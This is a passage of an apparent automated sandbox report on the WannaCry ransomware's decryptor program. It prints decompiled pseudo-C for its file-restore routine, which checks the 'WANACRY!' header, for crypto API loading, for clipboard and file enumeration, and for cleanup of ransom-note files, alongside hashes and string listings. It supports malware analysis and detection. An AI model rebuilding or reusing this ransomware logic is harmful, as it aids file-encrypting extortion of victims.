						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}

APIs

Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2

swprintf.MSVCRT ref: 00402728
FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
#825.MFC42(?,?,?,?), ref: 0040276F

Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44

#825.MFC42(?), ref: 004027A5
wcscmp.MSVCRT ref: 004027E1
wcscmp.MSVCRT ref: 004027FB
swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
GetFileAttributesW.KERNEL32(?), ref: 00402830
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
wcslen.MSVCRT ref: 0040286E
?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
FindNextFileW.KERNEL32(?,?), ref: 0040296A
FindClose.KERNEL32(?), ref: 0040297D

Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56

Strings

@WanaDecryptor@.exe.lnk, xrefs: 004028D7, 00402A1C
%s\%s, xrefs: 0040281C, 00402A06, 00402A26
@WanaDecryptor@.bmp, xrefs: 004028ED
%s\*, xrefs: 0040271A
@Please_Read_Me@.txt, xrefs: 004028BD, 004029FC

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
API String ID: 1037557366-268640142
Opcode ID: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
Opcode Fuzzy Hash: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
CloseHandle.KERNEL32(00000000), ref: 00402234
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
_local_unwind2.MSVCRT ref: 00402452

Strings

WANACRY!, xrefs: 00402181

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
String ID: WANACRY!
API String ID: 1586634678-1240840912
Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}

APIs

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
OpenClipboard.USER32(?), ref: 004035E9
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
#3301.MFC42(?,00000000,00000000), ref: 0040361A
#924.MFC42 ref: 00403635
#800.MFC42 ref: 00403646
#800.MFC42 ref: 00403665
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
GlobalLock.KERNEL32(00000000), ref: 0040369C
GlobalFree.KERNEL32(00000000), ref: 004036AB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
#3301.MFC42(?,00000000,00000000), ref: 004036E7
#924.MFC42(00000000), ref: 00403702
#800.MFC42(00000000), ref: 00403713
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
wcslen.MSVCRT ref: 00403753
wcslen.MSVCRT ref: 0040377B
#800.MFC42 ref: 00403797
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
GlobalUnlock.KERNEL32(00000000), ref: 004037CE
EmptyClipboard.USER32 ref: 004037D4
SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
CloseClipboard.USER32 ref: 004037E3

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
String ID:
API String ID: 3405503685-0
Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}

APIs

FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
sscanf.MSVCRT ref: 00403D26
fopen.MSVCRT ref: 00403D45
fread.MSVCRT ref: 00403D69
sprintf.MSVCRT ref: 00403D99
SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
#823.MFC42(00000088), ref: 00403DE4
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
fclose.MSVCRT ref: 00403E16
FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
FindClose.KERNEL32(?), ref: 00403E3B

Strings

*.res, xrefs: 00403CC1
\, xrefs: 00403DBB
My Computer, xrefs: 00403D93
\, xrefs: 00403DB4
%08X.res, xrefs: 00403D20

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
String ID: %08X.res$*.res$My Computer$\$\
API String ID: 1476605332-298172004
Opcode ID: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
Opcode Fuzzy Hash: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4

Strings

advapi32.dll, xrefs: 00404B81
CryptAcquireContextA, xrefs: 00404B9D
CryptDecrypt, xrefs: 00404BCC
CryptImportKey, xrefs: 00404BA5
CryptEncrypt, xrefs: 00404BBF
CryptDestroyKey, xrefs: 00404BB2
CryptGenKey, xrefs: 00404BD9

Memory Dump Source

